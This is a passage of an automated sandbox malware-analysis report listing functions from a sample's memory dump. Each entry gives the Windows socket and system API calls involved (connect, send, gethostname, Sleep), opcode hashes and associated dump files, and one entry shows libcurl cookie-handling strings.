                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: f767aa06db4711789fecd0017fef48b5e7a2eecd86a2778707c1385322e43928
                                                          • Instruction ID: 13ba21e419373e4efb6d398db1a04347830677edef2d39c8f388abe206b7d0d0
                                                          • Opcode Fuzzy Hash: f767aa06db4711789fecd0017fef48b5e7a2eecd86a2778707c1385322e43928
                                                          • Instruction Fuzzy Hash: EE0128363042009BCA255A39C884EABF399FF8D374F050B18F978931E1D726ED908751
                                                          Function 00304950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 00304AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID:
                                                          • API String ID: 144339138-0
                                                          • Opcode ID: 862c44ba48919e934aa7aded5d0db498e72375d2465ee486b04a9bf8b2ceba16
                                                          • Instruction ID: 9a7809c63fd61bedf0162ec45927b270e2493e8c57c573e824af54ac93f3851e
                                                          • Opcode Fuzzy Hash: 862c44ba48919e934aa7aded5d0db498e72375d2465ee486b04a9bf8b2ceba16
                                                          • Instruction Fuzzy Hash: 7C5106F06067009BE7329F69DE6972376D4AF01315F05183DEA8A8AAD1E7B4EA44C742
                                                          Function 0031AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0031AFD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: b18ad57931dc9bca5d8f07d2dfefe66ecf6fac78e6410e5572ad9016a5bc7e59
                                                          • Instruction ID: 2f90084e14b412cb4c8c2ba3d7d82bc5243b73f2e4cf5c4ea2efc90f3c3eafc9
                                                          • Opcode Fuzzy Hash: b18ad57931dc9bca5d8f07d2dfefe66ecf6fac78e6410e5572ad9016a5bc7e59
                                                          • Instruction Fuzzy Hash: 90116670808B8595EB2A8F18D8027F6F3F4EFD4329F109619F59942550F7729AC68BC2
                                                          Function 0031A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0031A97F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: f15ae21a0c40087d5e4a7965191c843013476f0984717276ac6581fca7bf59d2
                                                          • Instruction ID: b81f071cf3188fbdc95878c31d8aff3e02ac531d70d97799b7615d81fa0acabe
                                                          • Opcode Fuzzy Hash: f15ae21a0c40087d5e4a7965191c843013476f0984717276ac6581fca7bf59d2
                                                          • Instruction Fuzzy Hash: 1D01A771B017149FC6158F14D845B96B7A5EF84721F068559F9981B361C331BC508BD1
                                                          Function 0031AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,0031B280,00000000,-00000001,00000000,0031B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0031AF67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: 99001baa9a4f49b93a24538914bd0869921a94899a96c990757f8d7912c63732
                                                          • Instruction ID: 32da174348398e1885e8fe174ddc79d34e276bff3a60d4540bedb99ce4f7ced5
                                                          • Opcode Fuzzy Hash: 99001baa9a4f49b93a24538914bd0869921a94899a96c990757f8d7912c63732
                                                          • Instruction Fuzzy Hash: 18E0E5B6A056216BD555DA18E8449ABF369EFC4B11F055A49B85457304C330AC5187E2
                                                          Function 0031B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • closesocket.WS2_32(?,00319422,?,?,?,?,?,?,?,?,?,?,?,w30,006E8640,00000000), ref: 0031B04D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: 51df4f2abbaf6480c31f56293cf93e65a1f2e07aa864d222a1c71525a26e53dd
                                                          • Instruction ID: 2a0efd9e778a1bb9bf93f0648df0fac7540e20f524286837e38f1f0b1b382422
                                                          • Opcode Fuzzy Hash: 51df4f2abbaf6480c31f56293cf93e65a1f2e07aa864d222a1c71525a26e53dd
                                                          • Instruction Fuzzy Hash: F9D0C23430020157CA288A14C884A97B26B7FC8310FA9CB6CE02C8A160C73BCC838601
                                                          Function 002B67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0028AF56,?,00000001), ref: 002B67FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: c2969d2fff838ed7ecffaece353f6f324c0bfcf722ef9ad633545515d191a21f
                                                          • Instruction ID: cf197a33307673fae5981a8a78e34832f12856552c5e8151f62079c405236f7b
                                                          • Opcode Fuzzy Hash: c2969d2fff838ed7ecffaece353f6f324c0bfcf722ef9ad633545515d191a21f
                                                          • Instruction Fuzzy Hash: 06C012F1218101AFC6088724D455F2FB6D9DB44365F01581CB046C1190EA305990CA16
                                                          Function 002531D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 0ba2a3677ac23c7b1b3561f722c9de052bfc159db0bb98e89ec346d98156f979
                                                          • Instruction ID: c75f5a228fc32a4fdb2a6a3c35671f24d4bc40312fb77392b96b8ae3c51b48d7
                                                          • Opcode Fuzzy Hash: 0ba2a3677ac23c7b1b3561f722c9de052bfc159db0bb98e89ec346d98156f979
                                                          • Instruction Fuzzy Hash: 973192B1D147059BCB50EFA8C58569EBBF4BF44344F00886EE898E7301E7749A488F52
                                                          Function 005DB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 895ecf07aa25c614233177ec8c37cc56dc316f4aa6dacb9fbae3fc04d058247b
                                                          • Instruction ID: 3d594bcbd009574b00663e8c63257ccec64304e6f9c0818071db428b2b3c047e
                                                          • Opcode Fuzzy Hash: 895ecf07aa25c614233177ec8c37cc56dc316f4aa6dacb9fbae3fc04d058247b
                                                          • Instruction Fuzzy Hash: 2FC09BE0C1574447DB00BF3CC64611E79E97741104FC11F68D98896195F73CD31C8667

                                                          Non-executed Functions

                                                          Function 00291BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                          • API String ID: 0-1371176463
                                                          • Opcode ID: 474a818dfddec92d9b7562621fe2a11df8f82909b5e66cc0fa4f68acd87417e5
                                                          • Instruction ID: 48ed04d73c1e5464c367227778bf6586eb5821ff8976b4cde97936e0f6053325
                                                          • Opcode Fuzzy Hash: 474a818dfddec92d9b7562621fe2a11df8f82909b5e66cc0fa4f68acd87417e5
                                                          • Instruction Fuzzy Hash: 50B23970A28702FBEF24AE25EC42B26BBD4AF54704F14442DFC8996382E775DD788751
                                                          Function 00264940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
